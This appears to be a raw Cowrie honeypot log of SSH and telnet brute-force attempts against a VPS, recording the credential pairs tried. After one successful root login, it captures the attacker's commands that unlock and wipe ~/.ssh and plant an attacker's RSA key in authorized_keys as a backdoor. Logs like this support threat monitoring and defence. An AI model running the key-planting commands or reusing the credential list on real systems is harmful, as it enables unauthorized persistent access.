{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:11:19.464912Z","src_ip":"212.227.125.160","session":"d785b5b55015"}
{"eventid":"cowrie.login.failed","username":"www","password":"abc123","message":"login attempt [www/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:11:22.327108Z","src_ip":"212.227.125.160","session":"d785b5b55015"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:11:23.722137Z","src_ip":"212.227.125.160","session":"d785b5b55015"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":42156,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7f79fc2739d","protocol":"ssh","message":"New connection: 102.210.148.92:42156 (1.2.3.4:22) [session: e7f79fc2739d]","sensor":"my-vps","timestamp":"2025-08-31T07:11:45.299958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:11:45.300953Z","src_ip":"102.210.148.92","session":"e7f79fc2739d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:11:45.468257Z","src_ip":"102.210.148.92","session":"e7f79fc2739d"}
{"eventid":"cowrie.login.failed","username":"controll","password":"3edc4RFV","message":"login attempt [controll/3edc4RFV] failed","sensor":"my-vps","timestamp":"2025-08-31T07:11:46.175596Z","src_ip":"102.210.148.92","session":"e7f79fc2739d"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:11:47.345169Z","src_ip":"102.210.148.92","session":"e7f79fc2739d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50656,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3d83d288398","protocol":"ssh","message":"New connection: 212.227.235.229:50656 (1.2.3.4:22) [session: e3d83d288398]","sensor":"my-vps","timestamp":"2025-08-31T07:11:56.150743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:11:56.892694Z","src_ip":"212.227.235.229","session":"e3d83d288398"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:11:56.893415Z","src_ip":"212.227.235.229","session":"e3d83d288398"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456","message":"login attempt [zabbix/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T07:12:03.026899Z","src_ip":"212.227.235.229","session":"e3d83d288398"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:12:04.855429Z","src_ip":"212.227.235.229","session":"e3d83d288398"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40480,"dst_ip":"1.2.3.4","dst_port":22,"session":"fffcff00b5df","protocol":"ssh","message":"New connection: 212.227.125.160:40480 (1.2.3.4:22) [session: fffcff00b5df]","sensor":"my-vps","timestamp":"2025-08-31T07:12:16.944371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:12:17.407766Z","src_ip":"212.227.125.160","session":"fffcff00b5df"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:12:17.408542Z","src_ip":"212.227.125.160","session":"fffcff00b5df"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456","message":"login attempt [zabbix/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T07:12:18.946002Z","src_ip":"212.227.125.160","session":"fffcff00b5df"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:12:20.582592Z","src_ip":"212.227.125.160","session":"fffcff00b5df"}
{"eventid":"cowrie.session.connect","src_ip":"65.25.121.94","src_port":37771,"dst_ip":"1.2.3.4","dst_port":23,"session":"7278de23d94f","protocol":"telnet","message":"New connection: 65.25.121.94:37771 (1.2.3.4:23) [session: 7278de23d94f]","sensor":"my-vps","timestamp":"2025-08-31T07:12:37.780861Z"}
{"eventid":"cowrie.session.closed","duration":13.298707008361816,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:12:51.079502Z","src_ip":"65.25.121.94","session":"7278de23d94f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56842,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e0efc40dfa5","protocol":"ssh","message":"New connection: 212.227.235.229:56842 (1.2.3.4:22) [session: 8e0efc40dfa5]","sensor":"my-vps","timestamp":"2025-08-31T07:12:53.944309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:12:54.705404Z","src_ip":"212.227.235.229","session":"8e0efc40dfa5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:12:54.706127Z","src_ip":"212.227.235.229","session":"8e0efc40dfa5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49835,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a34d209b394","protocol":"ssh","message":"New connection: 212.227.235.229:49835 (1.2.3.4:22) [session: 7a34d209b394]","sensor":"my-vps","timestamp":"2025-08-31T07:12:58.767328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:12:58.802281Z","src_ip":"212.227.235.229","session":"7a34d209b394"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:12:58.966711Z","src_ip":"212.227.235.229","session":"7a34d209b394"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"12345","message":"login attempt [zabbix/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T07:13:00.471411Z","src_ip":"212.227.235.229","session":"8e0efc40dfa5"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":40478,"dst_ip":"1.2.3.4","dst_port":22,"session":"a87de7c90a94","protocol":"ssh","message":"New connection: 102.210.148.92:40478 (1.2.3.4:22) [session: a87de7c90a94]","sensor":"my-vps","timestamp":"2025-08-31T07:13:00.678473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:13:00.679417Z","src_ip":"102.210.148.92","session":"a87de7c90a94"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:13:00.853679Z","src_ip":"102.210.148.92","session":"a87de7c90a94"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456123456","message":"login attempt [admin/123456123456] failed","sensor":"my-vps","timestamp":"2025-08-31T07:13:01.592249Z","src_ip":"102.210.148.92","session":"a87de7c90a94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44430,"dst_ip":"1.2.3.4","dst_port":23,"session":"57f71b1ef0c3","protocol":"telnet","message":"New connection: 212.227.235.229:44430 (1.2.3.4:23) [session: 57f71b1ef0c3]","sensor":"my-vps","timestamp":"2025-08-31T07:13:02.017587Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.235.229:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.235.229:23] failed","sensor":"my-vps","timestamp":"2025-08-31T07:13:02.020114Z","src_ip":"212.227.235.229","session":"57f71b1ef0c3"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-31T07:13:02.021043Z","src_ip":"212.227.235.229","session":"57f71b1ef0c3"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-31T07:13:02.021935Z","src_ip":"212.227.235.229","session":"57f71b1ef0c3"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:13:02.347240Z","src_ip":"212.227.235.229","session":"8e0efc40dfa5"}
{"eventid":"cowrie.session.closed","duration":0.3930084705352783,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:13:02.410523Z","src_ip":"212.227.235.229","session":"57f71b1ef0c3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:13:02.768392Z","src_ip":"102.210.148.92","session":"a87de7c90a94"}
{"eventid":"cowrie.login.success","username":"root","password":"L@y3rh0st2024","message":"login attempt [root/L@y3rh0st2024] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:13:03.268383Z","src_ip":"212.227.235.229","session":"7a34d209b394"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:13:03.774812Z","src_ip":"212.227.235.229","session":"7a34d209b394"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T07:13:03.775590Z","src_ip":"212.227.235.229","session":"7a34d209b394"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T07:13:03.776638Z","src_ip":"212.227.235.229","session":"7a34d209b394"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:13:04.751195Z","src_ip":"212.227.235.229","session":"7a34d209b394"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:13:06.056882Z","src_ip":"212.227.235.229","session":"7a34d209b394"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T07:13:06.057662Z","src_ip":"212.227.235.229","session":"7a34d209b394"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T07:13:06.416957Z","src_ip":"212.227.235.229","session":"7a34d209b394"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:13:06.417891Z","src_ip":"212.227.235.229","session":"7a34d209b394"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52248,"dst_ip":"1.2.3.4","dst_port":22,"session":"1557cc27bf10","protocol":"ssh","message":"New connection: 212.227.235.229:52248 (1.2.3.4:22) [session: 1557cc27bf10]","sensor":"my-vps","timestamp":"2025-08-31T07:13:06.582131Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37816,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e46d0144c6e","protocol":"ssh","message":"New connection: 212.227.125.160:37816 (1.2.3.4:22) [session: 9e46d0144c6e]","sensor":"my-vps","timestamp":"2025-08-31T07:13:07.105634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:13:07.178011Z","src_ip":"212.227.235.229","session":"1557cc27bf10"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:13:07.342011Z","src_ip":"212.227.235.229","session":"1557cc27bf10"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:13:08.337629Z","src_ip":"212.227.125.160","session":"9e46d0144c6e"}
